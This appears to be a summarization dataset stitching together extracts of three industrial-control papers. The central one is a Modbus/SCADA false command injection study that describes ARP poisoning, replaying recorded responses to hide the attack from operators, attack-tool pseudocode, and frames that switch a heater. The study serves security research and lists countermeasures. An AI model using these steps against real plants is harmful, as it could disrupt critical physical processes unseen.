We develop a deep-learning-based multicrane visual sorting system with virtualized programmable logiccontrollers (PLCs) in intelligent manufacturing, which en-ables the accurate location and suction of the materialson the conveyor belt. First, virtualized PLCs are deployedin the eld and the cloud to break data islands for ef cientcommunication between low-level devices. Second, arti -cial intelligence algorithms are integrated into the physicalindustrial control system in which cooperation between vir-tualized PLCs and the visual recognition model is devel-oped to complete the industrial control closed loop. Third,we establish a visual recognition model in which objectdetection algorithms are used to process the original im-age and then obtain the position and type of the objectin the pixel coordinate system. In addition, a new linearinterpolation-based backpropagation neural network is pre-sented to provide the transform relation between the pixelcoordinate system and the world coordinate system that the crane needs to precisely suck the material. The whole system is applied in a time-sensitive network environmentin a highly reliable and stable manner. The experimentalprototype system demonstrates that high recognition ac-curacy can be achieved for the visual sorting system withinan acceptable time frame. The accuracy of the sorting taskreaches 96.5% and the average consumption time of each Manuscript received 1 January 2023; revised 8 March 2023 and 28 July 2023; accepted 27 August 2023. Date of publication 22 Septem- ber 2023; date of current version 23 February 2024. This work wassupported in part by the National Key Research and Development Program under Grant 2020YFB1708800, in part by Guangdong Key Research and Development Program under Grant 2020B0101130007,in part by the Fundamental Research Funds for Central Universitiesunder Grant FRF-MP-20-37, in part by Guangdong Basic and Applied Basic Research Foundation under Grant 2021A1515110577, in part by China Postdoctoral Science Foundation under Grant 2021M700385,and in part by the Central Guidance on Local Science and TechnologyDevelopment Fund of Shanxi Province under Grant YDZJSX2022B019. Paper no. TII-23-0005. (Corresponding author: Jianquan Wang.) Meixia Fu, Zhenqian Wang, Jianquan Wang, Qu Wang, and Zhangchao Ma are with the School of Automation and Electrical Engi-neering, Institute of Industrial Internet, University of Science and Tech- nology Beijing, Beijing 100083, China (e-mail: mxfu1205@ustb.edu.cn; m202120722@xs.ustb.edu.cn; wangjianquan@ustb.edu.cn; wangqu@ustb.edu.cn; mazhangchao@ustb.edu.cn). Danshi Wang is with the State Key Laboratory of Information Pho- tonics and Optical Communications, Beijing University of Posts and Telecommunications, Beijing 100876, China (e-mail: danshi_wang@bupt.edu.cn). Color versions of one or more gures in this article are available at https://doi.org/10.1109/TII.2023.3313641. Digital Object Identi er 10.1109/TII.2023.3313641object is approximately 2.317 s when the speed of the con- veyor belt is 5.2 m/min.
|
Summarize:
Index Terms SCADA; PLCs; ICSs; Modbus Protocol; Cyber-attacks; Command Injection Attacks; I. I NTRODUCTION Supervisory Control and Data Acquisition (SCADA) sys- tems are employed by millions of industries and plants to mon- itor and control critical physical processes such as oil and gas facilities, water treatment systems, nuclear plants, electrical power grids, etc. SCADA systems provide users with a fully automated control, as well as a remote access and service mon- itor. Typical SCADA systems consist of different industrial components e.g., Engineering Work Stations (EWSs), Human Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), Input/Output (I/O) modules, sensors, valves, motors, and others [1]. Due to the necessity of having a remote management in the critical infrastructures, SCADA systems are increasingly connected to Ethernet and Transmission Con- trol Protocol/Internet Protocol (TCP/IP) based networks e.g., Internet, as well as Virtual Private Network (VPN)-based remote access to reduce maintenance costs [2]. Unfortunately, this connectivity brings its own risks and exposes millions of systems to cyber-attacks from the outer world that were not existing in the air-gapped era [3].The security of SCADA systems has been recently a major focus of the cyber-security researchers and industrial engineers due to the critical role they play in any automation company. It is not a secret that many old SCADA components with no security measures are still operating in many critical plants for two major reasons. First, industrial devices have a long life-cycle (twenty years or longer) which results in not being security patched (up-to-date) for a while. Secondly, there may be legacy devices that are not compatible with newer security-improved protocols. Wherefore, we should expect that many insecure SCADA devices are placed in remote locations and linked to the outer world via Internet. Thus, if a skilled adversary gains access to a SCADA network, he can perform malicious attacks to disrupt the physical process that the target system controls, which eventually might cause serious damages as Stuxnet [4], BlackEnergy [5], Shamoon [6], Kemuri [7] and German Steel Mill [8] showed. Along with the system-level security concerns, SCADA pro- tocols such as Modbus, Distributed Network Protocol (DNP3), High Level Data Link Control (HDLC), International Electro Technical Commission (IEC) 60870, etc. are substantially vulnerable and lack fundamental security mechanisms [9]. All these protocols provide client/server communications between different SCADA devices connected on different buses or networks. The Modbus protocol [10] is believed to be the most common industrial protocol implemented by hundreds of ven- dors on thousands of device models to transfer digital/analog inputs/outputs and register data between the connected devices e.g., HMIs and PLCs. Despite that Modbus provides the indus- trial community with simplicity, applicability, and ef ciency, it contains multiple vulnerabilities that have allowed attackers to exploit the insecurity of the protocol and conduct different attacks e.g., reconnaissance activity, command injection, data injection, access injection, etc. Hijacking the interconnection between PLC and HMI devices represents the most often used attack scenario targeting SCADA systems using the Modbus such the one occurred against Maroochy water breach [11]. In this work, we introduce a stealthy False Command Injection (FCI) attack approach based on integrating a database containing real Modbus request-response pairs between PLC and HMI devices. The database is created prior to the launch of our attack i.e., of ine. In our approach, an attacker placed inCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) 978-1-6654-9734-3/23/$31.00 2023 IEEE2023 IEEE 20th Consumer Communications & Networking Conference (CCNC) | 978-1-6654-9734-3/23/$31.00 2023 IEEE | DOI: 10.1109/CCNC51644.2023.10059804 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. a man-in-the-middle (MITM) position interrupts the Modbus requests sent from the HMI dropping them from the network so they do not reach the PLC, compares them to the ones existing in his database, and then replies to the HMI with the expected responses. Meanwhile, he can inject the PLC with false commands i.e., sending malicious requests that alter inputs or outputs causing a dangerous behavior on his will. In other words, our approach effectively decouples the PLC from the HMI i.e., it generates two independent communication ows: one between the PLC and the attacker, and the other between the attacker and the HMI. This scenario is quite severe as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. For a practical implementation, we conducted our approach on a virtual SCADA system based on OpenPLC1and ScadaBR2software. This is due to logistic constraints and the dif culty of using real-world SCADA systems for research purposes. Finally we suggested some security countermeasures and mitigation solutions to prevent such a serious threat. The rest of the paper is structured as follows. Section II discusses related works, while Section III provides a security overview of Modbus protocol. In section IV , we illustrate our attack approach, and show the implementation as well as the resulting evaluation in section V . Finally, we suggest some security countermeasures and appropriate mitigation solutions in Section VI, and conclude this paper in section VII. II. R ELATED WORK Modbus protocol is very simple, ef cient and public free on one hand, But on the other hand it has many vulnerabilities that allows an adversary to perform reconnaissance activity or use arbitrary commands. Possible vulnerabilities in the Modbus speci cation and major implementations of the protocol were investigated by Hitsi [12]. Such weaknesses can be exploited to perform spoo ng, replay, and ooding attacks. Morris et al. [13] illustrated theoretical data injection and Denial of Service (DoS) attacks against industrial equipment that relies on Modbus. Such attacks stem from the protocol s insuf cient security measures for data integrity and availability. Morris, in a follow-up work [14], described and tested reconnaissance, response injection, command injection, and DoS attacks, and also elaborated on several standalone and stateful Intrusion Detection System (IDS) rules in an attempt to deter such incidents. Nardone et al. [15] formally analyzed and assessed the Modbus protocol in terms of the security features each variant provides. The work by Tsalis et al. [16] demonstrated that even in the presence of encryption, side-channel attacks might reveal information on Modbus protocol messages. Using a testbed comprising of virtual machines running on Linux, Parian et al. [17] detailed on two attacks, namely manipulation of packets via malware-infected hosts and classic MITM attacks i.e., Address Resolution Protocol (ARP) poisoning. 1https://openplcproject.com/ 2http://www.scadabr.com.br/Rosa et al. [2] showed the implementation of a set of attacks targeting a Hybrid Environment for Design and Validation (HEDVa). For a practical attack scenario, the authors built and con gured a small testbed controlled by Modbus PLCs. As a part of their work, they conducted network reconnais- sance, MITM attack, and nally injected PLCs with dangerous Read/Write (R/W) coils requests. All the aforementioned works focused on confusing the physical processes controlled by exposed PLCs using the vulnerabilities of the Modbus protocol. But, the SCADA operator could detect and disclose these attacks easily as they can observe abnormal changes displayed on the HMIs. In our paper, we overcome this challenge and conceal our attack by sending the HMI fake views similar to the ones it expects to receive as illustrated in Section IV . III. M ODBUS PROTOCOL AND VULNERABILITIES Modbus is an application layer messaging protocol located at the seventh level of the OSI3model. It provides a mas- ter/slave communication between devices connected on dif- ferent buses and networks. Figure 1 depicts a typical SCADA communication where a data acquisition server or an HMI will run as a Modbus client component (master) and a PLC will run as its pair device, that is, a server component (slave). Fig. 1: Example of interaction between Modbus master and slave devices The master device (HMI) sends a Modbus request to the connected slave device (PLC) to poll the data. The PLC replies upon the request with a Modbus response to the HMI. If the request is not correct, then the HMI sends exception response to the PLC. Figure 2 shows the architecture of a Modbus frame encapsulated over TCP/IP protocol. The Function code eld determines the action required from the the PLC to do. Table I gives the details of some function codes and their corresponding actions. These function codes are the most frequently used in an interaction between PLCs and HMIs in SCADA systems. The Modbus protocol itself lacks various security features which exposes it to cyber-attacks hijacking the Modbus com- munication between the connected devices and manipulating the frames to inject false commands/data into the PLC. How- ever, in the following we list the most reported vulnerabilities in Modbus protocol as described in [19] [21]: 3https://www.fortinet.com/resources/cyberglossary/osi-modelCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 2: Modbus TCP/IP frame format, adopted from [18] Table I: Function codes and their corresponding actions Function Code Modbus Function 0x01 Read Coil Status 0x02 Read Discrete Input 0x03 Read Holding Registers 0x04 Read Input Registers 0x05 Write Single Coil 0x06 Write Single Holding Register 0x15 Write Multiple Coils 0x16 Write Multiple Holding Registers 0x17 Report Slave ID - Integrity of Modbus frame is not veri ed by peer devices [22], [23]. The frame can be altered by an attacker and peer devices cannot reveal this manipulation. - There is no facility for maintaining con dentiality of messages. The Modbus frames are transferred in plain text and any attacker placed in MITM position can sniff the packet and access the frame information. - It does not support time-stamp for the frames. This is one of the critical problems because peer devices cannot know whether the received response is obtained for the recent or old request. Therefore, any manipulation may happen due to mismatch of real-time eld values. - Modbus is an open protocol and it had a simple frame format. Thus, A network analyzer tool usch as Wireshark4 can be used by an attacker to retrieve the information from the network. As a result of lacking the aforementioned security measures, Modbus is highly vulnerable to various cyber-attacks such as MITM attacks in the form of False Command Injection (FCI), False Access Injection (FAI), False Response Injection (FRI), Replay attacks and DoS attacks [24] [27]. IV. A TTACK DESCRIPTION Figure 3 shows a high-level overview of the attack scenario we perform to inject the PLC with false commands without being noticed by the HMI device. To this end, we need rst to discover the network topology of the target system, then collect Modbus TCP/IP packets from the network traf c 4https://www.wireshark.org/to create our database that eventually contains real request- response interaction pairs. However, these two steps are done prior to our injection attack. After collecting the needed pairs, we start our main attack by poisoning the ARP cache of the connected devices i.e., the HMI and PLC, and then inject the target PLC with false commands whilst we send the expected response packet upon each request to the HMI. This conceals our attack and the SCADA operator will be always shown fake views that he is expecting to see. In the following, we elaborate each attack step in detail. A. Pre-Attack Phase (Of ine) Here, the attacker aims to get an overview of the network topology, open ports, connected devices, and communication protocols used in the target system. Then, he sniffs and collects real interactions between the HMI and PLC i.e., request- response pairs that both stations exchange over the Modbus TCP/IP frames. 1) Network Reconnaissance: Discovering the network is the rst step that an attacker needs to do, meant to collect information/data about all the components of the SCADA environment, to identify the network topology, hosts and services. For instance, industrial devices such as PLCs and HMIs are identi ed by IP and Media Access Control (MAC) addresses, operating system versions and a set of services. Thus, to obtain these addresses and information we used the NMAP5Port scanner that identi es the Modbus protocol on the network. Figure 4 shows the scanning process where synchronize (SYN) packets are sent from the attacker machine over the network. Fig. 4: Network Reconnaissance Attack Using this technique, SYN packets can scan thousands of ports per second due to the fact that the TCP connection is not fully established (half-open communication). Therefore, it is dif cult to detect by default network rules. 2) Snif ng and Collecting Data: NMAP tool provides the attacker only a perspective on the target system from the network point-of-view. Meaning that, it does not provide process-level information, which is required to implement so- phisticated attacks. Thus, in the next step the attacker listens to 5https://nmap.org/CCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 3: High-level Overview of our Attack Approach the network traf c and captures each Modbus TCP/IP request frame sent from the HMI alongside with its corresponding Modbus response(s) from the PLC. To this end, we rst run a network analyzer software e.g., Wiershark. Our investigations showed that each request and its corresponding response(s) share the same Transaction Identi er (TID), Unit ID (which indicates how many frames the response from the PLC is comprised of), and Function Code. For this, encapsulated Modbus protocol messages can be extracted and grouped into request-response pairs based on those three parameters. Figure 5 shows an example of a Modbus interaction between PLC and HMI devices where the response from the PLC consists of two frames, and all the frames (request and response) have the same values: 0x19bd inTID, 0x02 inUnit ID, and 0x03 inFunction Code. Fig. 5: Example of a Modbus request-response interaction between PLC and HMI Based on those parameters, an attacker can easily extract and pair the Modbus packets as request-response frames.Moreover, he can analyze the packets deeper and gather more detailed information about each Modbus register effected the others. To quicken the comparison process during our injection, all the duplicate pairs are eliminated as depicted in gure 6. Please note that duplicated messages can exist if there is a periodical status check between the PLC and HMI. Finally, to collect a suf cient number of request-response pairs, the snif ng process should last for a reasonably long period of time e.g., in this work, we sniff the network for approx. 30 minutes. For our virtual SCADA system presented in gure 9, we managed successfully to create a database containing 18 request-response pairs. It is worth mentioning that pairing the captured Modbus frames in our database into request-response frames, helps the attacker to win the strict race condition that the HMI and PLC must meet before he replies his forged Modbus response frame to the HMI. B. Attack Phase (Online) At the end of the previous stage, an attacker has the Modbus request-response frames that are frequently exchanged between the HMI and PLC. So, he can start his major attack by rst placing himself between the HMI and PLC (MITM position). This step is done by using the well-known ARP Poisoning approach. Then all messages will go through the attacker s machine who drops the received request frame from the network, compares it to the ones existing in the database and nally responses to the HMI with the expected correct response accordingly. In the mean time, the attacker sends the PLC a malicious request frame e.g., R/W coils request, and drops also the original response sent from the PLC to the HMI. In the following, we illustrate this phase in detail. 1) ARP Poisoning (MITM) Approach: The concept of an ARP poisoning attack comprises of two parts: an ARP spoof- ing and a communication hijacking. In the rst stage, an attacker manipulates the ARP cache of both PLC and HMI devices by broadcasting malicious and forged "is-at" ARP messages over the network as depicted in gure 7. This technique forces both devices to send the packets through theCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 6: Scheme of creating our database attacker MAC address, and requires from the attacker to only know both IP and MAC addresses of the victims (e.g., HMI and PLC) which are already obtained in the early steps of the pre-attack phase. Fig. 7: ARP Poisoning Attack As soon as the ARP cache of each victim is spoofed, the traf c gets redirected through the attacker s machine. At this point, the attacker is capable of reading all the Modbus messages transmitted between the HMI and PLC, and then for- warding them to the nal destination respectively (interception attack), or actively change them before pushing them back to the network (modi cation attack). Please note that the HMI may generate a realistic state update, while decoupling HMI- PLC interactions. For this purpose, the adversary should reply to each Modbus request in real-time. Moreover, TCP session hijacking requires from the attacker to maintain the integrity of the TCP connection e.g., appropriate TCP sequence numbers to prevent losing the connection. 2) Stealthy Command Injection Attack: Figure 8 presents the full-chain of our injection scenario. When a Modbusrequest frame is sent from the HMI to the PLC, the attacker intercepts this frame, drops it from the network, compares the frame to the request frames in his database, and nally com- putes the corresponding response(s) accordingly. Meanwhile, he sends a forged Modbus request frame (e.g., R/W coils request) to the PLC impersonating the HMI. This approach is quite severe as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. Fig. 8: Stealthy Command Injection Attack Scenario This approach has a challenge. If an attacker stops his ARP poisoning attack i.e., he stops sending fake response messages to the HMI, and the HMI requires the PLC registers values upon a Modbus request frame, the PLC responses reporting the current PLC status i.e., the modi ed inputs and outputs. Therefore, the SCADA operator can reveal that the system isCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 9: Virtual SCADA system based on OpenPLC and ScadaBR software operating abnormally. To overcome this challenge and make our attack even severer than it is, the attacker should re-initiate all the registers to the values stored prior to his attack. To this end, he needs to read all the register values before the attack, and writes these values again to the PLC before he closes the TCP communication with the devices. This restores the previously system state after stopping the attack and the PLC will report to the HMI the last view prior to the injection. V. I MPLEMENTATION AND EVALUATION A. Experimental Settings 1)Lab Setup: We evaluate our attack approach on a virtual SCADA system based on OpenPLC and ScadaBR software as shown in gure 9. The given virtual system represents a water tank heater experiment. It aims at keeping the temperature of a water tank at a certain value e.g. 40 C. Meaning that, if the temperature goes lower than 40 C, the corresponding sensor (Input) reports to the PLC, and the PLC responds by sending a control command to the heater (Output) to switch it ON. The heater remains ON until the temperature is again as high as the con gured set-point. This process works in two con guration modes: Auto and Manual. The interaction between both OpenPLC and ScadaBR is handled using Modbus protocol over TCP/IP where ScadaBR is the master device and OpenPLC is the slave device. The control logic program is developed using the OpenPLC Editor in one of the ve high-level programming languages de ned in IEC- 61131 [28]. The PLC Program is then compiled to an ST le before being uploaded to the OpenPLC. 2)Attacker Model: We assume that an attacker has access to the level-3 network of the Purdue Model6. This assumption is based on real world SCADA attacks e.g., TRITON [29] and BalckEnergy attack [5] that got access to the control center via a typical IT attack vector such as infected USB stick and social engineering attack. After the level-3 network 6https://www.goingstealthy.com/the-ics-prude-model/access, an attacker can make use of software and libraries to communicate with the target PLC over the network. Since these assumptions have been reported to hold true in reports on real world attacks, we are convinced that our attack is a realistic one. B. Attack Implementation After placing the attacker in MITM position between the ScadaBR and OpenPLC, he rst reads all the current values that are stored in the PLC s memory registers e.g., coils, inputs, etc. Figure 10,11,12,13,14 and 15 show all the request- response frames exchanged between the attacker and the OpenPLC to obtain these values. To inject the PLC with different false commands, we developed a simple python script that sends crafted Modbus request frames to the target IP address on the open port 502. Table II shows the format of the frames we used to attack the given virtual system in gure 9. For instance, if an attacker aims at turning the heater OFF in the Auto mode, the following frame should be sent to the PLC: 0x010600040000. Our results showed that we could successfully modify different inputs, outputs and data stored in the PLC registers as shown in gure 16. Fig. 10: Request frame sent from the attacker to the OpenPLC - Read all PLC coils To conceal our injection from the SCADA operator, we developed an attacking tool that sniffs all the Modbus re- quest frames from the network, compares them to the ones in our database, and nally responses with the appropriate response(s) to the HMI. Algorithm 1 depicts the main core ofCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Fig. 11: Response frame from the OpenPLC - Only two coils have values: Bit 0 and 63 Fig. 12: Request frame from the attacker to the OpenPLC - Read all discrete registers Fig. 13: Response frame from the OpenPLC - All the bits have the value of null Fig. 14: Request frame from the attacker to the OpenPLC - Read all PLC holding registers Fig. 15: Response frame from the OpenPLC - Only three registers have values in the PLC memory: Reg. 1,2 and 3 Fig. 16: The HMI monitor before and after the attack the python script we used to design our attacking tool. After launching our tool, if the ScadaBR sends a Modbus request (e.g., write single register) to the OpenPLC, our MITM system intercepts this frame, compares it with the ones existing in our database, precisely with the request frames and nally replies to the ScadaBR by sending the corresponding response frame(s) based on the Transaction ID, Unit ID, and Function Code. It is worth mentioning that the attacker still needs to drop the original request from the network to avoid updating the PLC s registers. However, this is an easy task as the attacker only needs to not complete the full-cycle of the MITM attack i.e., he does not forward the frame to the nal destination (PLC). Algorithm 1 FCI Attack based on the Database Approach Function inject (iface=eno, src_port) 1:packet = sniff (iface = eno, timeout = cfg_sniff_time) 2:save_pcap (sniff.pcap) 3:forpcap in rdpcap (save_pcap) do 4: src_id = pcap [1:6], dest_id = pcap [7:12], mbus_pkt = lter_mbus(pcap) 5: forpkt in mbus_pkt() do 6: trans_id = pkt [1:2], Protocol_id = pkt[3:4], Length = pkt[5:6], Unit_id = pkt[7], function = pkt[8:9], start_address = pkt[10:11], data = pkt[12: ] 7: if(src_ip = ScadaBR_src_ip & dest_ip = plc_ip) then 8: forp in rdpcap (response_pcap) do 9: iftrans_id == p[1:2] & unit_id == p[7] & function == p[8:9] then 10: fgd_pkt = p[1:]) break 11: end if 12: P = P+1 13: end for 14: end if 15: pkt = pkt + 1 16: end for 17: pcap = pcap + 1 18:end for 19:while time_slot() do 20: sendp(iface, fgd_pkt , src_ip, port) 21:end while END FunctionCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. Table II: Modbus frames and their corresponding actions Action Modbus frame Turning the Heater ON (Manual Mode) 0x01 0x06 0x00 0x05 0x00 0x01 Turning the Heater OFF (Manual Mode) 0x01 0x06 0x00 0x05 0x00 0x00 Turning the Heater ON (Auto Mode) 0x01 0x06 0x00 0x04 0x00 0x01 Turning the Heater OFF (Auto Mode) 0x01 0x06 0x00 0x04 0x00 0x00 Setting a new temperature 0x01 0x06 0x00 0x01 0x2f 0xff Setting a new set-point 0x01 0x06 0x00 0x02 0x2f 0xff VI. S ECURITY COUNTERMEASURES Our experiments presented in this paper showed that there is no security in the Modbus protocol. Therefore, if attackers could access a Modbus device on a network they would be able to read/write whatever and whenever they want. Based on this fact, many industrial engineers implemented rewalls between the internet server and the control network to protect their systems i.e., all the Modbus devices are placed behind the rewalls see gure 17. Fig. 17: SCADA system architecture using rewallsThis method splits Modbus devices from the internet but if any server behind the rewall is authorized to access the modbus devices through the rewall there is a vulnerability. Therefore, implementing rewalls alone without any additional security measures failed partly to prevent cyber-attacks. The advanced rewall presented in [30] would be a more reason- able protection method. The authors designed an industrial- speci c rewall based on the Modbus protocol. Their rewall combines security policies with Deep Packet Inspection (DPI). An alternative solution would be using the modi ed version of the modbus protocol introduced in [31]. This new protocol version implements anti-replay techniques and authentication mechanisms that validate each packet received at modbus devices. Another appropriate solution would be the one in- troduced in [32] which deploys security functions in the messaging stack prior to the transmission. The authors used AES [33], RSA [34], or SHA-2 [35] algorithms to encrypt the Modbus packet while a secret key is exchanged between the master and the salve using a separate secure channel. All the aforementioned security methods are reasonable solutions to secure Modbus based SCADA systems against our injection attack or similar scenarios if they are implemented. VII. CONCLUSION AND FUTURE WORK This paper presented a false command injection (FCI) attack scenario against Modbus based SCADA systems, where an external adversary exploited insecurities of the Modbus pro- tocol and injected the target PLC with malicious commands. To make our attack more challenging, we involved a database containing real request-response interaction pairs which helps the adversary to always reply to the HMI with the expected responses. This could conceal our attack from the operator, and decouples the PLC from the HMI i.e., the operator will not notice any abnormal behavior on the control site. Our attack scenario is quite severe in case it is conducted against real- world SCADA systems, and the consequences could be even disastrous if the targets are critical infrastructures or nuclear plants. To secure Modbus based SCADA systems, plants, and industrial environments we suggested some security coun- termeasures that assist in mitigating/detecting our attack or similar scenarios if they are applied. In respect of securing SCADA systems, the Modbus orga- nization released a newer Modbus protocol variant namely, Modbus Transport Layer Security (TLS7) running on the port 7https://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdfCCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply. 802. This advanced protocol adds security speci cations that the traditional Modbus protocol lacks (e.g., authentication and messages-integrity mechanisms) to prevent cyber-attacks such as DoS, MITM, replay attacks, etc. The Modbus TLS is still not well analyzed by the researchers from the security point-of-view. Thus, we aim in the future to investigate this developed protocol against our attack approach as the Modbus organization claimed that it is more resilient against cyber- attacks and even secure by an additional security layer between the server and client devices. Therefore, investigating the security of such a protocol will be more challenging and complex.
Summary:
Modbus is a widely-used industrial protocol in Supervisory Control and Data Acquisition (SCADA) systems for different purposes such as controlling remote devices, monitoring physical processes, data acquisition, etc. Unfortunately, such a protocol lacks security means i.e., authentication, integrity, and con dentiality. This has exposed industrial plants using the Modbus protocol and made them attractive to malicious adversaries who could perform various kinds of cyber-attacks causing signi cant consequences as Stuxnet showed. In this paper, we exploit the insecurity of the Modbus protocol and perform a stealthy false command injection scenario concealing our injection from the SCADA operator. Our attack approach is comprised of two main phases: 1) Pre-attack phase (of ine) where an attacker sniffs, collects and stores suf cient valid request- response pairs in a database, 2) Attack phase (online) where the attacker performs false command injection and conceals his injection by replaying a valid response from his database upon each request sent from the HMI user. Such a scenario is quite severe and might cause disastrous damages in SCADA systems and critical infrastructures if it is successfully implemented by malicious adversaries. Finally, we suggest some appropriate mitigation solutions to prevent such a serious threat.
|
Summarize:
I. INTRODUCTION Recently, industrial control system s (ICSs) connect to the internet , PLC (Programmable Logic Controller ) is becoming network communication device introduces [1]. Accordingly , a number of the security incident s such as cyber - and virus -attacks have been reported so far [2][3] . Therefore, it is necessary to apply countermeasures to not only monitoring system and network device but also PLC . The formers are developed based on information security techniques bec ause ICS introduces Windows OS and TCP/IP based network to connect to the internet . On the other hand, the latter case is not the same as the former cases because the firmware of PLC is not always standardization. The previous study propose s an incident detection technique via Petri nets as one of the countermeasure s applicable for PLC [4]. This method focus es on the input -output of the field devices connecting to PLC . The detection method us es the anomaly behavior models which is modeled the field devices via Petri net. That model s can be regarded as pattern file s of black list type antivirus softs. The detection performance of the black list depend s on pattern file s and then requires frequent update of the pattern files to keep the high detection rate , while the black list allows us to identify the category of the security incident . Also , the CPU lo ad depends on the pattern file size when the system checks on the black list . The large size file affect adversely the real time processing performance of PLC, at worst, results in the anomaly behaviors of filed devices. This study focuses a detection method which is based on white list. Reference [5] propose s a white list targeting communications packet s in SCADA ( Supervisory Control And Data Acquisition ). Reference [6] propose s a white list target ing VoIP. These detection methods register the normal operation as lists and detect anomaly operation which is not registered at white list . This detection method does not need to update the list to keep the high detection rate. The CPU load due to check on the white list is lower than on the black list. The update timing of the white list is the system maintenance when the normal op eration of ICS is changed . Therefore , we apply the white list t o the PLC, and aim to detect security incident s appearing on the field device. It is expected that the white list allows PLC to detect the cyber -attack like the virus Stuxnet and PLC Bluster that change the part data of the control program by taking over the normal control command. In this study, we define the list which is registered the behavior of sensor and actuator as a white list. In the first, we model the normal operations via Petri net. Second, we convert the Petri net model to ladder diagram. Ladder diagram is one of the program language which is often used in programming PLC. This method app lies white list on the application program. Therefore, it can add the detection method to the PLC without regard to type of PLC . There are previous studies which propose the way to convert the Petri net model to the ladder diagram [7][8] . Reference [7] proposed the transform method to express the behavior of Petri net by ladder diagram. Converted ladder diagram by this previous study method have only event order information of Petri net. Therefore, it cannot detect the abnormal operations by converted ladder diagram. In this study, we propose the transform method to convert the Petri net model to ladder diagram with constraint condition of Petri net. In addition, we add the diagnostic function to the ladder diagram which diagnose whether the meeting constraint condition . Therefore, it can detect the incidents by ladder diagram. In the first, this paper describes the Petri net and ladder diagram. In the next, this paper proposes the transform method which can convert the Petri net model to ladder diagram. Finally, this paper shows the result of verification experiments. On Expe rimental Verification of Model B ased White list for PLC Anomaly D etection Akinori Mochizuki, K enji Sawada, S eiichi Shin, The University of Electro -Communications Shu Hosokawa, Control System Security Center * This work was supported by Council for Science, Technology and Innovation (CSTI), Cross -ministerial Strategic Innovation Promotion Program (SIP), Cyber -Security for Critical Infrastructure (funding agency: NEDO). Akinori Mochizuki is with The University of Electro -Communications, Tokyo, Japan (e -mail: akinori.m@ uec.ac.jp). Kenji Sawada is with The University of Electro -Communications, Tokyo, Japan (e -mail: knj.sawada @ uec.ac.jp). Shin Seiichi is with The University of Electro -Communications, Tokyo, Japan (e -mail: seiichi.shin @ uec.ac.jp). Shu Hosokawa is with Control System Security Center, Miyagi, Japan (e-mail: shu.hosokawa@css -center.or.jp). 2017 11th Asian Control Conference (ASCC) Gold Coast Convention Centre, Australia December 17-20, 2017 978-1-5090-1573-3/17/$31.00 2017 IEEE 1766 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. II. MODELING VIA PETRI NET A. Petri net Petri net is a modeling tool which can model the discrete event system [9]. Petri net is bipartite graph composing two nodes class: place and transition. These two nodes are connected by arc. Table I shows the formal definition of Petri net according to [10]. Table I. Formal definition of Petri net Petri net is a 5 -tupple, =( , , , , 0) where: ={ 1, 2, , } is a finite set of places, ={ 1, 2, ,t } is a finite set of transitions, ( ) ( ) is a set of arcs , : {1,2,3, } is a weight function, 0: {0,1,2,3, } is the initial marking, = and P . Petri net structu re =( , , , ) without any specific ini tial marking is denoted by . Petri net with the given initial marking is denoted by ( , 0). Petri nets have asynchronous and concurrency. In addition , Petri nets are applicable for modeling of dynamic state transitions. Therefore, it can visualize the incident dynamic state. The state of the system is represented by the number of tokens which occupy the Place. If the transition is fired, the tokens are removed from input place and ma rked in output place. A transition is enabled if each of its input places contains at least as many tokens as there are arcs from the place to the transition. Petri net model shows system behavior using this firing rule. Let x be a number of marking tokens . Then the following equation (1) is always satisfied. M is an arbitrary natural number s. Graphically, places are represented by circles, transitions by rectangles, arcs by directed arrows, and tokens by small solid circles. Fig. 1 shows the simplest Petri net model. It is necessary to define the meaning of transitions and place, when model the control system via Petri net. Fig.2 shows the self-loop. Self -loop means transition and place are connected by interactive arc. The transition which is connected self -loop can fire only when place has a token. Therefore, self -loop can limit the transition firing. In addition, there is an inhibitor arc that limit the transition firing. Fig. 3 shows the inhibitor arc. The transition whic h is connected inhibitor arc can fire only when connecting place has no tokens. B. Timed Petri net Timed Petri net is introduced time concept into the Petri net [11]. Time Petri nets (TPN) are classic Petri nets where each transition is associated with a time interval [ at, bt]. When transition becomes enabled, it cannot fire before at time units have elapsed, and it has to fire no later than bt time units after being enabled. Here at and bt are relative to the point in time when transition last became enabled. The time at is the earliest possible firing time for t ransition and is called earliest firing time of t ransition , and bt is the latest possible firing time for t and is called latest firing time of t ransition . The firing of a transitio n itself does not take up any time. This Timed Petri net can visualize the operation delay by introducing Timed Petri net. Fig. 4 shows the Timed Petri net model. C. The Reason Why t he Petri net Almost the control system is consist ed of field device, sensor and 